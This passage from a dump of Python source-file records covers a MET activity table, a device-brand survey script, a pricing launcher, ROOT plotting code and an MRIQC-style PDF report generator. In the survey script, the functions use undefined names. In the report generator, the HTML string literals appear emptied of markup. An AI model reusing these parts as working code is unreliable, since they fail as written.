3.3\n ,6070 : 6.0\n ,6072 : 4.0\n ,6074 : 2.3\n ,6080 : 5.0\n ,6090 : 4.5\n ,6100 : 5.0\n ,6110 : 5.0\n ,6120 : 5.0\n ,6122 : 5.0\n ,6124 : 3.0\n ,6126 : 2.5\n ,6127 : 4.5\n ,6128 : 6.0\n ,6130 : 4.5\n ,6140 : 3.8\n ,6144 : 3.0\n ,6150 : 5.0\n ,6160 : 3.3\n ,6165 : 4.5\n ,6167 : 3.0\n ,6170 : 3.0\n ,6180 : 6.0\n ,6190 : 4.5\n ,6200 : 4.5\n ,6205 : 2.0\n ,6210 : 5.0\n ,6220 : 4.5\n ,6225 : 2.0\n ,6230 : 4.5\n ,6240 : 3.3 }\n\n # Unpacking with * works with any object that is iterable and, since dictionaries return their keys when iterated through, you can easily create a list by using it within a list literal.\n self.ckeys = [*self.metValue] # another option : list(self.metValue.keys())\n\n self.metDescription = {6010 : \"airplane repair\"\n ,6020 : \"automobile body work\"\n ,6030 : \"automobile repair, light or moderate effort\"\n ,6040 : \"carpentry, general, workshop (Taylor Code 620)\"\n ,6050 : \"carpentry, outside house, installing rain gutters (Taylor Code 640),carpentry, outside house, building a fence\"\n ,6052 : \"carpentry, outside house, building a fence\"\n ,6060 : \"carpentry, finishing or refinishing cabinets or furniture\"\n ,6070 : \"carpentry, sawing hardwood\"\n ,6072 : \"carpentry, home remodeling tasks, moderate effort\"\n ,6074 : \"carpentry, home remodeling tasks, light effort \"\n ,6080 : \"caulking, chinking log cabin\"\n ,6090 : \"caulking, except log cabin\"\n ,6100 : \"cleaning gutters\"\n ,6110 : \"excavating garage\"\n ,6120 : \"hanging storm windows\"\n ,6122 : \"hanging sheet rock inside house\"\n ,6124 : \"hammering nails\"\n ,6126 : \"home repair, general, light effort\"\n ,6127 : \"home repair, general, moderate effort\"\n ,6128 : \"home repair, general, vigorous effort\"\n ,6130 : \"laying or removing carpet\"\n ,6140 : \"laying tile or linoleum,repairing appliances\"\n ,6144 : \"repairing appliances\"\n ,6150 : \"painting, outside home (Taylor Code 650)\"\n ,6160 : \"painting inside house,wallpapering, scraping paint\"\n ,6165 : \"painting, (Taylor Code 
630)\"\n ,6167 : \"plumbing, general\"\n ,6170 : \"put on and removal of tarp - sailboat\"\n ,6180 : \"roofing\"\n ,6190 : \"sanding floors with a power sander\"\n ,6200 : \"scraping and painting sailboat or powerboat\"\n ,6205 : \"sharpening tools\"\n ,6210 : \"spreading dirt with a shovel\"\n ,6220 : \"washing and waxing hull of sailboat or airplane\"\n ,6225 : \"washing and waxing car\"\n ,6230 : \"washing fence, painting fence, moderate effort\"\n ,6240 : \"wiring, tapping-splicing\"}\n\n self.metDescription_fr = {6010 : \"réparation d'un avion\"\n ,6020 : \"travailler sur la carrosserie d'une automobile\"\n ,6030 : \"réparation automobile, effort léger ou modéré\"\n ,6040 : \"menuiserie, général, atelier (code Taylor 620)\"\n ,6050 : \"menuiserie, extérieur de la maison, installer des gouttières, construire une clôture (code Taylor 640)\"\n ,6052 : \"menuiserie, extérieur de la maison, construire une clôture\"\n ,6060 : \"menuiserie, finition ou restauration de meubles\"\n ,6070 : \"menuiserie, scier du bois de feuillus\"\n ,6072 : \"menuiserie, travaux de rénovation résidentielle, effort modéré\"\n ,6074 : \"menuiserie, travaux de rénovation résidentielle, effort léger\"\n ,6080 : \"calfeutrer, isoler une cabane en bois\"\n ,6090 : \"calfeutrer, hors cabane\"\n ,6100 : \"nettoyer les gouttières\"\n ,6110 : \"creuser un garage\"\n ,6120 : \"poser des doubles fenêtres\"\n ,6122 : \"poser des plaques de plâtre à l’intérieur d’une maison\"\n ,6124 : \"planter des clous\"\n ,6126 : \"réparation domestique, général, effort léger\"\n ,6127 : \"réparation domestique, général, effort modéré\"\n ,6128 : \"réparation domestique, général, effort vigoureux\"\n ,6130 : \"poser ou retirer de la moquette\"\n ,6140 : \"poser du carrelage ou du linoléum, réparer des appareils\"\n ,6144 : \"réparer des appareils\"\n ,6150 : \"peindre, extérieur de la maison (code Taylor 650)\"\n ,6160 : \"peindre, intérieur de la maison, papier peint, décapage de peinture\"\n ,6165 : \"peindre, (code Taylor 630)\"\n ,6167 : \"plomberie, général\"\n ,6170 : \"poser et retirer une bâche – voilier\"\n ,6180 : \"poser la toiture\"\n ,6190 : \"poncer les sols avec une ponceuse\"\n ,6200 : \"décaper et peindre un voilier ou un hors-bord\"\n ,6205 : \"affûter des outils\"\n ,6210 : \"étaler de la terre à l'aide d'une pelle\"\n ,6220 : \"laver et cirer la coque d'un voilier ou un avion\"\n ,6225 : \"laver et cirer une voiture\"\n ,6230 : \"laver une clôture, peindre une clôture, effort modéré\"\n ,6240 : \"câblage, dériver-connecter\"} \n\n def printValues(self):\n print(\"Beginning dump for 'HomeRepair' \")\n super().printValues()\n\n def getMetValue(self, code):\n return super().getMetValue(code)\n\nif __name__ == \"__main__\":\n b = HomeRepair()\n b.printValues()\n print(b.getMetValue(6020))\n for l in b:\n print(l)","sub_path":"libs/applibs/compendium/c06homerepair.py","file_name":"c06homerepair.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583728672","text":"# -*- coding: utf-8 -*-\n# ver 1.0 -- 2017/11/6 --\n\nimport threading\nimport time\nimport xlrd\nimport xlsxwriter\n\n\nclass Util(object):\n \"\"\"None\"\"\"\n def __init__(self):\n None\n\n def list_split(self, l1, n=1):\n \"\"\"\n split l1 = [a1, a2, a3, a4, a5], n = 2\n return l2 = [[a1, a2], [a3, a4], [a5]]\n \"\"\"\n if (len(l1) % n) == 0:\n m = len(l1) // n\n else:\n m = len(l1) // n + 1\n l2 = [l1[i * n:(i + 1) * n] for i in range(m)]\n return l2\n\n def 
multi_task(self, obj, arg_list, n=1):\n \"\"\"type(arg_list) == list\"\"\"\n threadpool = []\n a = Util()\n arg_list = a.list_split(arg_list, n)\n for sub_arg_list in arg_list:\n # print(sub_arg_list)\n th = threading.Thread(target=obj, args=(sub_arg_list,))\n threadpool.append(th)\n for th in threadpool:\n th.start()\n for th in threadpool:\n threading.Thread.join(th)\n\n def get_dev_list(self, path):\n \"\"\"\n 根据CMDB导出的输入文件input.xlsx获取设备list\n \"\"\"\n dev_list = []\n input_data = xlrd.open_workbook(path) #'/Users/huaqiang/Downloads/input.xlsx')\n table = input_data.sheets()[0]\n row_count = table.nrows\n col_count = table.ncols\n for index in range(0, col_count):\n # print(table.row_values(0)[index])\n if table.row_values(0)[index].encode() == '站点名称'.encode():\n site_name_num = index\n if table.row_values(0)[index].encode() == '防火墙/路由器-LAN'.encode():\n lan_ip_num = index\n # print(site_name_num,lan_ip_num)\n for index in range(1, row_count):\n dev_info = {\n 'Site_name': table.row_values(index)[site_name_num],\n 'IP': table.row_values(index)[lan_ip_num]\n }\n dev_list.append(dev_info)\n return dev_list\n\n\ndef get_brand(dev_list):\n \"\"\"none\"\"\"\n brand_name = 'Null'\n for device in dev_list:\n #brand = NetDevMgmt(host=device['IP'], usr='', pwd='').get_fw_brand()\n if brand == 2:\n brand_name = 'Huawei'\n if brand == 1:\n brand_name = 'H3C'\n if brand == 0:\n brand_name = 'Sangfor'\n\n brand_info = {\n 'Site_name': device['Site_name'],\n 'IP': device['IP'],\n 'Brand': brand_name\n }\n brand_list.append(brand_info)\n\n\ndef main():\n \"\"\"none\"\"\"\n start = time.time()\n path = '/ops/NetMgmt/'\n threadpool = []\n dev_list = get_dev_list(path + 'input_file/input.xlsx')\n\n n = 10\n dev_list_new = list_spilit(dev_list, n)\n print(dev_list_new)\n\n for sub_dev_list in dev_list_new:\n th = threading.Thread(target=get_brand, args=(sub_dev_list,))\n threadpool.append(th)\n\n for th in threadpool:\n th.start()\n\n for th in threadpool:\n threading.Thread.join(th)\n\n workbook = xlsxwriter.Workbook(path + 'result/brand.xlsx')\n table = workbook.add_worksheet('brand')\n table.write(0, 0, 'Site')\n table.write(1, 0, 'IP')\n table.write(2, 0, 'Brand')\n\n row = 1\n for item in brand_list:\n table.write(row, 0, item['Site_name'])\n table.write(row, 1, item['IP'])\n table.write(row, 2, item['Brand'])\n row = row + 1\n\n workbook.close()\n\n end = time.time()\n print(end - start)\n\n\nif __name__ == '__main__':\n main()","sub_path":"scripts/modules/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"256833621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom setproctitle import setproctitle as ptitle\nfrom util.arg_parser import init_parser\nfrom pricing.onlineFairRSPricing import onlineFairRSPricing, fairness_metrics\nfrom util.utils import read_others\nimport numpy as np\nfrom datetime import datetime\nimport pandas as pd\n\nif __name__ == '__main__':\n print('################ START TIME: {} ################'.format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))\n\n parser = init_parser()\n args = parser.parse_args()\n ptitle('Pri_a{}_K{}_o{}'.format(args.a, args.K, args.omega))\n\n if not args.OMEGA: OMEGA = np.array([0.4, 0.42, 0.44, 0.46, 0.48, 0.5, 0.52, 0.54, 0.56, 0.58])\n else: OMEGA = [float(i) for i in args.OMEGA]\n\n if not args.pricingDays: pricingDays = [16, 17, 18, 19, 20] #[0.49, 0.5, 0.51, 0.52]\n else: pricingDays = [int(i) for 
i in args.pricingDays]\n\n # li = []\n # for day in pricingDays:\n # df = pd.read_csv('../data/haikou_10_{}_3km.csv'.format(day))\n # df = df.sort_values(by=['time_step'], ascending=[True])\n # li.append(df)\n # all_riders = pd.concat(li, axis=0, ignore_index=True)\n\n pricing_args = {\n 'OMEGA':OMEGA,\n 'omega': args.omega,\n 'a':args.a,\n 'K':args.K,\n 'eta_peak':args.eta_peak,\n 'eta_off':args.eta_off,\n 'sigma': args.sigma, #args.sigma\n 'days': pricingDays,\n 'threshold': args.threshold\n }\n\n\n onlineFairRSPricing(**pricing_args)\n\n # if len(pricingDays) > 1:\n # order_file = '../data/haikou_10_{}to{}_3km_default.csv'.format(pricingDays[0], pricingDays[1])\n # else:\n # order_file = '../data/haikou_10_{}_3km_default.csv'.format(pricingDays[0])\n #\n # fairness_metrics('ProfitOnly',K=args.K, order_file=order_file)\n\n print('################ END TIME: {} ################'.format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))","sub_path":"src/main_pricing.py","file_name":"main_pricing.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"494357907","text":"# The finalClosurePlots script extracts the raw 2D histograms made by the closureStudyPlotter script\n# and puts them into final presentable form. An example call would be:\n# python studies/finalClosurePlots.py --tag someTag --pfaY subpath/to/nominal --pfaX1 subpath/to/new\n\nimport sys, os, ROOT, argparse\n\nROOT.TH1.SetDefaultSumw2()\nROOT.gROOT.SetBatch(True)\nROOT.gStyle.SetOptStat(\"\")\nROOT.gStyle.SetPaintTextFormat(\"3.2f\")\nROOT.gStyle.SetFrameLineWidth(2)\nROOT.gStyle.SetErrorX(0)\n\ndef prettyHisto(histo, xLabelSize, yLabelSize, zLabelSize, xTitleSize, yTitleSize, zTitleSize, xOffset, yOffset, zOffset,color=ROOT.kBlack, special=True):\n\n histo.GetYaxis().SetLabelSize(yLabelSize); histo.GetYaxis().SetTitleSize(yTitleSize); histo.GetYaxis().SetTitleOffset(yOffset)\n histo.GetXaxis().SetLabelSize(xLabelSize); histo.GetXaxis().SetTitleSize(xTitleSize); histo.GetXaxis().SetTitleOffset(xOffset)\n\n if special:\n if \"TH2\" in histo.ClassName():\n histo.GetZaxis().SetLabelSize(zLabelSize); histo.GetZaxis().SetTitleSize(zTitleSize)\n\n if \"TH1\" in histo.ClassName():\n histo.Rebin(1)\n if histo.Integral() != 0: histo.Scale(1./histo.Integral())\n histo.SetLineWidth(4)\n histo.SetLineColor(color)\n\n if \"THStack\" in histo.ClassName() or \"TH1\" in histo.ClassName():\n histo.GetXaxis().SetRangeUser(0.23,2.98)\n\ndef prettyProfile(histo, name, color, markerStyle, pfa):\n\n firstyBin = 1; option = \"\"\n if \"ETCorr\" in name:\n firstyBin = 2\n option = \"s\"\n\n p = histo.ProfileX(\"p_%s_%s\"%(pfa,name), firstyBin, -1, option)\n p.SetMarkerStyle(markerStyle)\n p.SetMarkerSize(3)\n p.SetLineWidth(3)\n p.SetMarkerColor(color)\n p.SetLineColor(color)\n p.Sumw2()\n\n return p\n\ndef fillMap(pfaKey, inRootDir):\n\n if \"NULL\" in inRootDir: return\n\n MAPPFAHISTOS[pfaKey] = {}\n\n for histoFile in os.listdir(inRootDir):\n\n if \".root\" not in histoFile: continue\n histoFile = ROOT.TFile.Open(inRootDir + \"/\" + histoFile, \"READ\")\n for hkey in histoFile.GetListOfKeys():\n if \"TH\" not in hkey.GetClassName(): continue\n\n name = hkey.GetName()\n histo = hkey.ReadObj()\n histo.SetDirectory(0)\n\n histo.Sumw2()\n \n if name in MAPPFAHISTOS[pfaKey].keys(): MAPPFAHISTOS[pfaKey][name].Add(histo)\n else: MAPPFAHISTOS[pfaKey][name] = histo\n\ndef draw2DHistoAndProfile(canvas, keyName, histoName, zMax, color, markerStyle, line, 
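# drewRatio: set once the first 2D histogram has been drawn, so later calls only overlay their profile on the same canvas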
drewRatio):\n\n canvas.cd()\n\n theHisto = MAPPFAHISTOS[keyName][histoName]\n\n pPFAX = prettyProfile(theHisto, histoName, color, markerStyle, keyName)\n\n if \"ETCorr\" in histoName: prettyHisto(theHisto, 0.050, 0.050, 0.050, 0.055, 0.055, 0.055, 1.0, 1.2, 1.0)\n else: prettyHisto(theHisto, 0.059, 0.059, 0.059, 0.072, 0.072, 0.072, 0.85, 0.72, 1.0)\n\n # Set some visual options for the actual 2D TP/RH\n if not drewRatio:\n theHisto.SetContour(255)\n\n if \"ETCorr\" in histoName:\n theHisto.GetXaxis().SetRangeUser(-0.25,20.25)\n theHisto.GetYaxis().SetRangeUser(-0.25,20.25)\n\n theHisto.GetXaxis().SetTitle(\"TP E_{T} [GeV] (t#bar{t}+0PU)\")\n theHisto.GetYaxis().SetTitle(\"TP E_{T} [GeV] (t#bar{t}+OOTPU)\")\n else: \n theHisto.GetYaxis().SetRangeUser(0.1,2.)\n\n theHisto.GetZaxis().SetRangeUser(1,zMax)\n theHisto.Draw(\"COLZ\")\n drewRatio = True\n \n # Sneak the line in so the profile is draw on top\n line.Draw(\"SAME\")\n pPFAX.Draw(\"EP SAME\")\n\n return drewRatio\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--tag\" , dest=\"tag\" , type=str, default=\"\" , help=\"Unique tag for output\")\n parser.add_argument(\"--pfaY\" , dest=\"pfaY\" , type=str, default=\"NULL\", help=\"Path to inputs for PFAY\")\n parser.add_argument(\"--pfaX1\" , dest=\"pfaX1\" , type=str, default=\"NULL\", help=\"Path to other PFAX dir\") \n parser.add_argument(\"--pfaX2\" , dest=\"pfaX2\" , type=str, default=\"NULL\", help=\"Path to other PFAX dir\") \n args = parser.parse_args()\n \n MAPPFAHISTOS = {}\n\n # Figure out the stub to use for the output directory\n # If neither pfaX1 or pfaX2 have been specified then quit!\n # The subtlety here is that pfaX1 takes precedence for the output directory\n if args.pfaX1 != \"NULL\": stub = args.pfaX1.split(\"Closure/\")[-1]\n elif args.pfaX2 != \"NULL\": stub = args.pfaX2.split(\"Closure/\")[-1]\n else: quit()\n\n tag = args.tag\n\n HOME = os.getenv(\"HOME\")\n OUTBASE = \"%s/nobackup/HCAL_Trigger_Study/plots/Closure\"%(HOME)\n INPUTLOC = \"%s/nobackup/HCAL_Trigger_Study/input/Closure\"%(HOME)\n\n # Save the input directories provided and fill the map of histos\n fillMap(\"PFAY\" , INPUTLOC + \"/\" + args.pfaY)\n fillMap(\"PFAX1\", INPUTLOC + \"/\" + args.pfaX1)\n fillMap(\"PFAX2\", INPUTLOC + \"/\" + args.pfaX2)\n\n # Set up the output directory and make it if it does not exist\n outpath = \"%s/%s/%s\"%(OUTBASE,stub,tag)\n if not os.path.exists(outpath): os.makedirs(outpath)\n\n # Save the final histograms\n for name in MAPPFAHISTOS.values()[0].keys():\n\n className = MAPPFAHISTOS.values()[0][name].ClassName()\n\n if \"TH2\" in className:\n zMax = 2e3 \n \n c1 = 0; line = 0\n if \"ETCorr\" in name:\n\n c1 = ROOT.TCanvas(\"%s\"%(name), \"%s\"%(name), 1600, 1440); c1.cd(); c1.SetLogz()\n\n ROOT.gPad.SetTopMargin(0.026)\n ROOT.gPad.SetBottomMargin(0.13)\n ROOT.gPad.SetLeftMargin(0.13)\n ROOT.gPad.SetRightMargin(0.14)\n\n ROOT.gPad.SetGridx()\n ROOT.gPad.SetGridy()\n\n line = ROOT.TLine(-0.25, -0.25, 20.65, 20.65) \n\n else:\n\n c1 = ROOT.TCanvas(\"%s\"%(name), \"%s\"%(name), 2400, 1440); c1.cd(); c1.SetLogz()\n\n ROOT.gPad.SetTopMargin(0.02625)\n ROOT.gPad.SetBottomMargin(0.13375)\n ROOT.gPad.SetLeftMargin(0.11)\n ROOT.gPad.SetRightMargin(0.12)\n\n line = ROOT.TLine(-28, 1, 28, 1) \n\n line.SetLineWidth(7)\n line.SetLineColor(ROOT.kBlack)\n line.SetLineStyle(7)\n\n drewRatio = False\n if \"PFAX1\" in MAPPFAHISTOS: drewRatio = draw2DHistoAndProfile(c1, \"PFAX1\", name, zMax, ROOT.kBlack , 20, line, drewRatio)\n if \"PFAX2\" in 
MAPPFAHISTOS: drewRatio = draw2DHistoAndProfile(c1, \"PFAX2\", name, zMax, ROOT.kPink+10, 20, line, drewRatio)\n if \"PFAY\" in MAPPFAHISTOS: drewRatio = draw2DHistoAndProfile(c1, \"PFAY\" , name, zMax, ROOT.kBlack , 4, line, drewRatio)\n\n ietaList = name.split(\"ieta\")[-1].split(\"to\")\n ietaStr = \"\"\n if len(ietaList) > 1: ietaStr = \"%s to %s\"%(ietaList[0],ietaList[1])\n else: ietaStr = \"%s\"%(ietaList[0])\n\n ietaText = ROOT.TPaveText(0.20, 0.86, 0.40, 0.95, \"trNDC\")\n ietaText.SetFillColor(ROOT.kWhite); ietaText.SetTextAlign(11); ietaText.SetTextFont(63); ietaText.SetTextSize(90)\n ietaText.AddText(\"|i#eta| = %s\"%(ietaStr))\n\n ietaText.Draw(\"SAME\")\n\n c1.SaveAs(\"%s/%s.pdf\"%(outpath,name))\n","sub_path":"scripts/studies/finalClosurePlots.py","file_name":"finalClosurePlots.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"331077458","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n# pylint: disable=no-member\n#\n# @Author: oesteban\n# @Date: 2016-01-05 11:33:39\n# @Email: code@oscaresteban.es\n# @Last modified by: oesteban\n# @Last Modified time: 2016-05-05 14:40:08\n\"\"\" Encapsulates report generation functions \"\"\"\n\nimport sys\nimport os\nimport os.path as op\nimport collections\nimport glob\nimport json\n\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nfrom .utils import find_failed, image_parameters\nfrom ..interfaces.viz_utils import plot_measures, plot_all\n\n# matplotlib.rc('figure', figsize=(11.69, 8.27)) # for DINA4 size\nSTRUCTURAL_QCGROUPS = [\n ['icvs_csf', 'icvs_gm', 'icvs_wm'],\n ['rpve_csf', 'rpve_gm', 'rpve_wm'],\n ['inu_range', 'inu_med'],\n ['cnr'], ['efc'], ['fber'], ['cjv'],\n ['fwhm_avg', 'fwhm_x', 'fwhm_y', 'fwhm_z'],\n ['qi1', 'qi2'],\n ['snr', 'snr_csf', 'snr_gm', 'snr_wm'],\n ['summary_mean_bg', 'summary_stdv_bg', 'summary_p05_bg', 'summary_p95_bg',\n 'summary_mean_csf', 'summary_stdv_csf', 'summary_p05_csf', 'summary_p95_csf',\n 'summary_mean_gm', 'summary_stdv_gm', 'summary_p05_gm', 'summary_p95_gm',\n 'summary_mean_wm', 'summary_stdv_wm', 'summary_p05_wm', 'summary_p95_wm']\n]\n\nFUNC_SPATIAL_QCGROUPS = [\n ['summary_mean_bg', 'summary_stdv_bg', 'summary_p05_bg', 'summary_p95_bg'],\n ['summary_mean_fg', 'summary_stdv_fg', 'summary_p05_fg', 'summary_p95_fg'],\n ['efc'],\n ['fber'],\n ['fwhm', 'fwhm_x', 'fwhm_y', 'fwhm_z'],\n ['gsr_%s' % a for a in ['x', 'y']],\n ['snr']\n]\n\nFUNC_TEMPORAL_QCGROUPS = [\n ['dvars'], ['gcor'], ['m_tsnr'], ['mean_fd'],\n ['num_fd'], ['outlier'], ['perc_fd'], ['quality']\n]\n\n\ndef workflow_report(qctype, settings=None):\n \"\"\" Creates the report \"\"\"\n import datetime\n\n dframe, failed = generate_csv(qctype, settings)\n sub_list = sorted(pd.unique(dframe.subject_id.ravel())) #pylint: disable=E1101\n\n if qctype == 'anat':\n qctype = 'anatomical'\n elif qctype == 'func':\n qctype = 'functional'\n\n out_dir = settings.get('output_dir', os.getcwd())\n work_dir = settings.get('work_dir', op.abspath('tmp'))\n out_file = op.join(out_dir, qctype + '_%s.pdf')\n\n result = {}\n func = getattr(sys.modules[__name__], 'report_' + qctype)\n\n imparams = image_parameters(dframe)\n pdf_group = []\n # Generate summary page\n out_sum = op.join(work_dir, 'summary_group.pdf')\n 
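# the cover page goes first in the group PDF; 'func' (report_anatomical/report_functional, resolved above via getattr) then draws the violin-plot summary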
summary_cover({'modality': qctype, 'failed': 'none', 'params': imparams},\n is_group=True, out_file=out_sum)\n pdf_group.append(out_sum)\n\n # Generate group report\n qc_group = op.join(work_dir, 'qc_measures_group.pdf')\n # Generate violinplots. If successfull, add documentation.\n func(dframe, out_file=qc_group)\n pdf_group.append(qc_group)\n\n if len(pdf_group) > 0:\n out_group_file = op.join(out_dir, '%s_group.pdf' % qctype)\n # Generate final report with collected pdfs in plots\n concat_pdf(pdf_group, out_group_file)\n result['group'] = {'success': True, 'path': out_group_file}\n\n out_indiv_files = []\n # Generate individual reports for subjects\n for subid in sub_list:\n # Get subject-specific info\n subdf = dframe.loc[dframe['subject_id'] == subid]\n sessions = sorted(pd.unique(subdf.session_id.ravel()))\n plots = []\n sess_scans = []\n subparams = {}\n # Re-build mosaic location\n for sesid in sessions:\n sesdf = subdf.loc[subdf['session_id'] == sesid]\n scans = sorted(pd.unique(sesdf.run_id.ravel()))\n\n # Each scan has a volume and (optional) fd plot\n for scanid in scans:\n subparams[(sesid, scanid)] = imparams[(subid, sesid, scanid)]\n if 'anat' in qctype:\n fpdf = op.join(work_dir, 'anatomical_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n\n if op.isfile(fpdf):\n plots.append(fpdf)\n\n if 'func' in qctype:\n mepi = op.join(work_dir, 'meanepi_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n if op.isfile(mepi):\n plots.append(mepi)\n\n tsnr = op.join(work_dir, 'tsnr_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n if op.isfile(tsnr):\n plots.append(tsnr)\n\n framedisp = op.join(work_dir, 'fd_%s_%s_%s.pdf' %\n (subid, sesid, scanid))\n if op.isfile(framedisp):\n plots.append(framedisp)\n\n sess_scans.append('%s (%s)' % (sesid, ', '.join(scans)))\n\n # Summary cover\n sfailed = []\n if failed:\n sfailed = ['%s (%s)' % (s[1], s[2])\n for s in failed if subid == s[0]]\n out_sum = op.join(work_dir, '%s_summary_%s.pdf' % (qctype, subid))\n summary_cover(\n {'sub_id': subid, 'modality': qctype, 'included': \", \".join(sess_scans),\n 'failed': \",\".join(sfailed) if sfailed else \"none\",\n 'params': subparams},\n out_file=out_sum)\n plots.insert(0, out_sum)\n\n # Summary (violinplots) of QC measures\n qc_ms = op.join(work_dir, '%s_measures_%s.pdf' % (qctype, subid))\n\n func(dframe, subject=subid, out_file=qc_ms)\n plots.append(qc_ms)\n\n if len(plots) > 0:\n # Generate final report with collected pdfs in plots\n sub_path = out_file % subid\n concat_pdf(plots, sub_path)\n out_indiv_files.append(sub_path)\n result[subid] = {'success': True, 'path': sub_path}\n return out_group_file, out_indiv_files, result\n\n\ndef summary_cover(data, is_group=False, out_file=None):\n \"\"\" Generates a cover page with subject information \"\"\"\n import datetime\n import codecs\n from xhtml2pdf import pisa # pylint: disable=no-name-in-module\n\n # open output file for writing (truncated binary)\n result = open(out_file, \"w+b\")\n\n substr = ''\n if is_group:\n substr += ''\n substr += (''\n '')\n\n\n for k, info in sorted(list(data['params'].items())):\n if is_group:\n substr += '' % tuple(k)\n else:\n substr += '' % tuple(k)\n substr += ''.format(**info)\n substr += '' % info['tr'] if 'tr' in info.keys() else ''\n substr += '' % info['size_t'] if 'size_t' in info.keys() else ''\n substr += '\\n'\n substr += '
<tr><th>Subject ID</th><th>Session</th><th>Scan ID</th><th>Image size (voxels)</th><th>Spacing (mm)</th><th>TR (ms)</th><th>Time steps</th></tr>
<tr><td>%s</td><td>%s</td><td>%s</td>
<tr><td>%s</td><td>%s</td><td>{size:s}</td><td>{spacing:s}</td><td>%f</td><td>N/A</td><td>%d</td><td>1</td></tr>
    '\n\n html_dir = op.abspath(\n op.join(op.dirname(__file__), 'html', 'cover_group.html'\n if is_group else 'cover_subj.html'))\n\n with codecs.open(html_dir, mode='r', encoding='utf-8') as ftpl:\n html = ftpl.read().format\n\n if is_group:\n values = {'imparams': substr, 'modality': data['modality'], 'failed': data['failed'],\n 'timestamp': datetime.datetime.now().strftime(\"%Y-%m-%d, %H:%M\")}\n else:\n values = {'sub_id': data['sub_id'], 'imparams': substr, 'modality': data['modality'],\n 'timestamp': datetime.datetime.now().strftime(\"%Y-%m-%d, %H:%M\"),\n 'failed': data['failed']}\n\n # convert HTML to PDF\n status = pisa.pisaDocument(html(**values), result, encoding='UTF-8')\n result.close()\n\n # return True on success and False on errors\n return status.err\n\n\ndef concat_pdf(in_files, out_file='concatenated.pdf'):\n \"\"\" Concatenate PDF list (http://stackoverflow.com/a/3444735) \"\"\"\n from PyPDF2 import PdfFileWriter, PdfFileReader\n\n with open(out_file, 'wb') as out_pdffile:\n outpdf = PdfFileWriter()\n\n for in_file in in_files:\n with open(in_file, 'rb') as in_pdffile:\n inpdf = PdfFileReader(in_pdffile)\n for fpdf in range(inpdf.numPages):\n outpdf.addPage(inpdf.getPage(fpdf))\n outpdf.write(out_pdffile)\n\n return out_file\n\n\ndef _write_report(dframe, groups, sub_id=None, sc_split=False, condensed=True,\n out_file='report.pdf'):\n \"\"\" Generates the violin plots of each qctype \"\"\"\n columns = dframe.columns.ravel()\n headers = []\n for group in groups:\n rem = []\n for head in group:\n if head not in columns:\n rem.append(head)\n else:\n headers.append(head)\n for i in rem:\n group.remove(i)\n\n report = PdfPages(out_file)\n sessions = sorted(pd.unique(dframe.session_id.ravel()))\n for ssid in sessions:\n sesdf = dframe.copy().loc[dframe['session_id'] == ssid]\n scans = pd.unique(sesdf.run_id.ravel())\n if sc_split:\n for scid in scans:\n subset = sesdf.loc[sesdf['run_id'] == scid]\n if len(subset.index) > 1:\n if sub_id is None:\n subtitle = '(%s_%s)' % (ssid, scid)\n else:\n subtitle = '(subject %s_%s_%s)' % (sub_id, ssid, scid)\n if condensed:\n fig = plot_all(sesdf, groups, subject=sub_id,\n title='QC measures ' + subtitle)\n else:\n fig = plot_measures(\n sesdf, headers, subject=sub_id,\n title='QC measures ' + subtitle)\n report.savefig(fig, dpi=300)\n fig.clf()\n else:\n if len(sesdf.index) > 1:\n if sub_id is None:\n subtitle = '(%s)' % (ssid)\n else:\n subtitle = '(subject %s_%s)' % (sub_id, ssid)\n if condensed:\n fig = plot_all(sesdf, groups, subject=sub_id,\n title='QC measures ' + subtitle)\n else:\n fig = plot_measures(\n sesdf, headers, subject=sub_id,\n title='QC measures ' + subtitle)\n report.savefig(fig, dpi=300)\n fig.clf()\n\n report.close()\n plt.close()\n # print 'Written report file %s' % out_file\n return out_file\n\ndef report_anatomical(\n dframe, subject=None, sc_split=False, condensed=True,\n out_file='anatomical.pdf'):\n \"\"\" Calls the report generator on the functional measures \"\"\"\n return _write_report(dframe, STRUCTURAL_QCGROUPS, sub_id=subject, sc_split=sc_split,\n condensed=condensed, out_file=out_file)\n\n\ndef report_functional(\n dframe, subject=None, sc_split=False, condensed=True,\n out_file='functional.pdf'):\n \"\"\" Calls the report generator on the functional measures \"\"\"\n from tempfile import mkdtemp\n\n wdir = mkdtemp()\n fspatial = _write_report(\n dframe, FUNC_TEMPORAL_QCGROUPS, sub_id=subject, sc_split=sc_split,\n condensed=condensed, out_file=op.join(wdir, 'fspatial.pdf'))\n\n ftemporal = 
